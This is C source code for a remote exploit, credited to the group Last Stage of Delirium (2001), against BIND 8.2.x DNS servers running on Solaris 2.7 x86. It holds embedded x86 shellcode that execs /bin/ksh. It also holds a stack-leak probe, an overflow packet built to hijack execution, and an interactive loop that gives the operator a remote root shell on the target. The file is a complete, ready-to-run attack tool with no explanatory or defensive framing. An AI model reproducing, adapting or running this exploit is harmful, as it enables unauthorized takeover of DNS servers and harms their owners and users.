#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
char asmcode[]=
"\x1b"
"\x90"
"\x33\xc0"
"\xeb\x09"
"\x5f"
"\x57"
"\x47"
"\xab"
"\x47"
"\xaa"
"\x5e"
"\xeb\x0e"
"\xe8\xf2\xff\xff\xff"
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3"
"\x33"
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\x8d\x4f\x10"
"\xb0\x44"
"\xab"
"\xab"
"\x91"
"\xab"
"\x95"
"\x66\xb9\x91\x54"
"\x51"
"\x66\xb9\x01\x01"
"\x51"
"\x33\xc0"
"\xb0\x36"
"\xff\xd6"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5d\x02"
"\x74\x03"
"\xe2\xe6"
"\x37"
"\xb0\x09"
"\x50"
"\x51"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\x33\xc0"
"\xb0\x3e"
"\xff\xd6"
"\xe2\xf2"
"\xeb\x13"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x52"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\xb0\x3b"
"\xff\xd6"
"\xe8\xe8\xff\xff\xff"
"/bin/ksh"
;
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for solaris 2.7 x86\n\n");
if(argc<2){
printf("usage: %s address [-s][-e]\n",argv[0]);
printf(" -s send infoleek packet\n");
printf(" -e send exploit packet\n");
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
asmcode[1+1+26+1+39+2]=(unsigned char)((n>>8)&0xff);
asmcode[1+1+26+1+39+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:\n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);
}
printf("\n\n");
fp=rev(*(unsigned int*)&buffer[532]);
ofs=0x0106-((fp-(fp&0xffffff00))&0xff);
cnt=163;
if((buffer[512+20+2]!=(char)0x04)&&(buffer[512+20+3]!=(char)0x08)){
printf("system does not seem to be a vulnerable solaris\n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a solaris\n");exit(-1);
}
if(cnt<(ofs+12)){
printf("frame ptr is too low to be successfully exploited\n");exit(-1);
}
jmp=rev(fp-583);
ptr6=rev((fp&0xffffff00)+8);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
b=buffer;
memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;
for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i];
for(i=0;i<(120>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=12;
memcpy(b,&jmp,4);b+=4;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+12;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!\n");
write(sck[1],"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
perror("error");exit(-1);
}